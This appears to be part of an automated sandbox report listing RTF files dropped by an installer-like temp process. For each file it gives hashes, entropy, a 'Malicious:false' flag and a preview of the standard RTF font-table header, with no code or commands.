                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37309
                                                                                                                                                                                                                                                          Entropy (8bit):5.035450399129397
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4JtOiBkyKWm+XcOl66fSndrdyzotzrcq4Ta:VkHHu4Ta
                                                                                                                                                                                                                                                          MD5:C121D028E5250297A8B932011A8122F9
                                                                                                                                                                                                                                                          SHA1:6E9E2CAE5D2200213EA2378E2F02E4237F0EA7F1
                                                                                                                                                                                                                                                          SHA-256:8246FF97F5D8EA82D7D9C00EC53309DC207026DD6B406B7B77E873563AB424DF
                                                                                                                                                                                                                                                          SHA-512:F93C9D589271DA049E037F0491E9B34CA1574113F488DDF302370BB1BC4CE55985A27A294B37A50100BEA4C9E209B5C6D8020843BD404B571B99E112E6F1CB3D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):78220
                                                                                                                                                                                                                                                          Entropy (8bit):4.998804403921912
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:w4NORVKcNG59+ppOBpvKeGpWONtetjIC1uCLCCiOBG/60Oc5IRcofyW26IA9w:w2GVFU59+/O3vKeO+5G
                                                                                                                                                                                                                                                          MD5:284D049932C02AFE360E12F1ACBBEB89
                                                                                                                                                                                                                                                          SHA1:F5D588FE773BF163D5FE123B38FCAF70AF53F786
                                                                                                                                                                                                                                                          SHA-256:9AD1BA3EF54FEA19A88AAABBAF13DBD8C798DA68B989F4E321594E54A5DB2AF6
                                                                                                                                                                                                                                                          SHA-512:AF4E3F43E6A258E8E45A2983A2DC1CE29190163B2DCDE25DC4AB3BFF4F1FC6E07E14BB4023FC5A7F7C008463BD1F8D7ADCB12D1FDAFD6503B41E94D2E98D74F8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43947
                                                                                                                                                                                                                                                          Entropy (8bit):5.053170962954844
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGUxQBkyKWm+m2NjrOX/zJwPzFZ6LUECxfxkSFgc/rcaVbnq4Tf:VklRPc4Tf
                                                                                                                                                                                                                                                          MD5:874129F2A6DD7287BADBF2EBD223923F
                                                                                                                                                                                                                                                          SHA1:A6D84C0AE81F13DE1C8952A8EA3602DC54B99C2E
                                                                                                                                                                                                                                                          SHA-256:C824F8E324B7B859ADCCA1F38437CEE6AA19ECF8FB5C8723C6347DCEA2206128
                                                                                                                                                                                                                                                          SHA-512:236A143EC7C0E1151CAE3B0399884E7498327B2F9E4C03FA65DCDCD9628CEE9BE6DEEC5A7B5312E8CB8B016C4B5BDAADDAEDD49E20F7D75F71AD63D49F85EDA2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36554
                                                                                                                                                                                                                                                          Entropy (8bit):5.033242301326159
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:w4FkNxjETicPI0QhhiLVUO9HZYSEWsIZ/6A9V:w4G3UntIA9V
                                                                                                                                                                                                                                                          MD5:60CFC0AB1C3A23B456BDEB0DD8010A83
                                                                                                                                                                                                                                                          SHA1:E2EB5D85ECC146BA756BB812247090D421D8F906
                                                                                                                                                                                                                                                          SHA-256:FB9A493F603C0027F6782538022DA6D82577FC0CE69146E66076EF94440B7D18
                                                                                                                                                                                                                                                          SHA-512:80ABA72B39079A7B4378C0B106CBB0098AE94BEAC586DC34BE10F5CE2D7F0193B20A215F0D98D08A709F934CB1AC05FCE6B15270D3E855F01BD9C814D95AA4AB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42973
                                                                                                                                                                                                                                                          Entropy (8bit):5.043020142659255
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFkwxjeVGh+DoLLXI1nhDGi3w2EHlT2njX8x3DkF8zHtrWM+cimZ/6A9r:wqR3tIA9r
                                                                                                                                                                                                                                                          MD5:286021A4AA9BD225FA7A87089380213E
                                                                                                                                                                                                                                                          SHA1:DA805EA3171A5FFF8357CD89F798D576D0B27E70
                                                                                                                                                                                                                                                          SHA-256:C447B4CA501DAB11FCDFF381BABF34C63BE48B0DADBC538D2C5F1CD07F4D7BCF
                                                                                                                                                                                                                                                          SHA-512:F4A21476EE1870D47162C29625D966D37C16B3F40EE30F54E68A8F81BAC74DEE3FD5C7489DC5F883745DB98E7BCB69B80DB00A664A3330FB0AB1DEF3AA9F7F56
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44680
                                                                                                                                                                                                                                                          Entropy (8bit):5.0440980385984355
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk13ixj20TaGC5X2kEDYd/awBGkRYoGPLo9C4Yhn8uw8h33SSnHDlM85baNRWmgA:VkGt4T3
                                                                                                                                                                                                                                                          MD5:8F7F1A8853F08FDC85B12A89E08CF432
                                                                                                                                                                                                                                                          SHA1:D2F7DCC9250548EA79E9AB2148E232B183527D2D
                                                                                                                                                                                                                                                          SHA-256:519A67854D21C49B501187DC6DE66AB09C403ABE68F5E3F20ECEAFD24FD92A51
                                                                                                                                                                                                                                                          SHA-512:871B3634AB86A66E58424D45984EF0EA8973220D3A17F58B4CD399807045E5A6C72505F82E40A2789BBCF62C219E1EBBFD109DB29A0ECD3433AD04A47434A48A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):55781
                                                                                                                                                                                                                                                          Entropy (8bit):4.974374262253835
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFkd4JQJHT2njX8x3TLjwUtqYepAkVZEdvI9DhL02GZLu5UZcHXqjHZCNVsMQgB:wqdThL0kIIA9Y
                                                                                                                                                                                                                                                          MD5:0BF8EF2B17B829705BB1D37632503C1F
                                                                                                                                                                                                                                                          SHA1:5E969D18969120A577205E785D8641CAD1037AA5
                                                                                                                                                                                                                                                          SHA-256:665B118FF5A8EA42EC98EB73371D9F28DAA619617F014E4C6FB9F4281521D391
                                                                                                                                                                                                                                                          SHA-512:6FA8B101F982EC8CB3987057591C90300C0C158A74D4DBCEFF179E994E9A560C5EF0F130314639B751B01501465B4D55C8DA68F95FF1F9E97174B3A8CF264AB3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45050
                                                                                                                                                                                                                                                          Entropy (8bit):5.040256574487364
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4JtHiBkyKWm+m2NjrOX/zJnKujtCUcFsWjeQ2CzLZ7RntKuG5QZ2y3OE50sq:VkNk4TF
                                                                                                                                                                                                                                                          MD5:94F6C834BB72118F52C6E4AFA65342BF
                                                                                                                                                                                                                                                          SHA1:5066CA137EA8AE0F1CFDB50D364C0A85BF31B98D
                                                                                                                                                                                                                                                          SHA-256:E950C0B4282DDB4BBBCA54BB72CB789B117690E1EFA15D7BE6C59BE5D77A65EA
                                                                                                                                                                                                                                                          SHA-512:80147E578792B71F77E06659978C233E4BE7AB1352B056DEC3BCA74A0E5F5A6386983B5935467BDDA4DDF34CD64304843903A85DAC3C813DCF49457810E670E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):68966
                                                                                                                                                                                                                                                          Entropy (8bit):4.980232511599592
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFy4FxrUJHT2njX8x3TLjwUtqYepAkVZEdvI9vTkdr9oY7sad4m11F8yO61x3fj:wqJ7RTkdtIA9J
                                                                                                                                                                                                                                                          MD5:84C18085AA83A3983748A25518050BF5
                                                                                                                                                                                                                                                          SHA1:92861E7CC4A6C458188EE78856C6D542EC279BD8
                                                                                                                                                                                                                                                          SHA-256:BB5C8F79F380A101456F8C6157E9999F906CE697B357789DB415B5182D4BBA21
                                                                                                                                                                                                                                                          SHA-512:A8477B72B61D832DB1C72074E70E6A3752F67C21A9B6DB02261CD155AD583806DFA866A4533DB2FFDE9D2B978C4972E3B4FA0BC06AC2E91F4F207C8468653A3B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Tim
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54358
                                                                                                                                                                                                                                                          Entropy (8bit):5.030949914338969
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk13TxjelQcX09coHJreOYSN4UIRopZMggLBbWm6CgqMPYZtYJxewPO1nS3jcL9A:VkLjoVq4TC
                                                                                                                                                                                                                                                          MD5:72F2281B43D886812D0AB9227F12438E
                                                                                                                                                                                                                                                          SHA1:9FA51047B63B8C6771351030059CA120DB60FCDA
                                                                                                                                                                                                                                                          SHA-256:A1D007010FAB6C2E57A687E45B26AC54BCCDCB91D4310C0BD7ECD0C478AFF63A
                                                                                                                                                                                                                                                          SHA-512:78FF6C728C82E2790C1D43759EDC5ECF4A883B6034246E4CC40A4526254E7CCBC766225B51A6ED22AD3B6EC96A2411F47922549146C7D621C68F9C8BCBB22226
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43957
                                                                                                                                                                                                                                                          Entropy (8bit):5.05318714443273
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmqAFbMmzigeIgpwgM/tI1m3AG8bq4Tn:VklnIqk4Tn
                                                                                                                                                                                                                                                          MD5:C802BE58C5B4EEE36B30EAE58603CBE5
                                                                                                                                                                                                                                                          SHA1:3F245C80D14B4051CDE661FE373FB7C57020019A
                                                                                                                                                                                                                                                          SHA-256:6D1E5226FE921E8E23C48A0F7C4FC06B815BB0D777C2DE20D6E4EB2A53100023
                                                                                                                                                                                                                                                          SHA-512:402EBEFF45912562F8248CA7018BEEDE532E91F54839AA5AE556590D6F9D9D786E39E9776808C30F050CDC22BEB595A715DF8A2603ED1AF675A2B07665B249FB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41999
                                                                                                                                                                                                                                                          Entropy (8bit):5.055697465978919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkmzS4JUAauTJcOerjj1oKauIKx49kWYcFBxBMdk+tkakaLMvIghQq4TP:Vku11S7u4TP
                                                                                                                                                                                                                                                          MD5:38D9C60C2583CC6714A0F317F3FD24AD
                                                                                                                                                                                                                                                          SHA1:06F40D2DD9A933E7073FD6B57475B879582B99D2
                                                                                                                                                                                                                                                          SHA-256:4825CB084B4CBE44982E0B965CCE2025C23D43CC3DDB6B4389F811C07A5EE872
                                                                                                                                                                                                                                                          SHA-512:C2397F026AF1AEFBE283F59D8188CB17C4BB43F6F228FFBF07A167DFC636D6D7504FC1BF69F53451C361FCD02646B9E96C2A6BE0FD3B12A58B9E42D8A729FB4D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
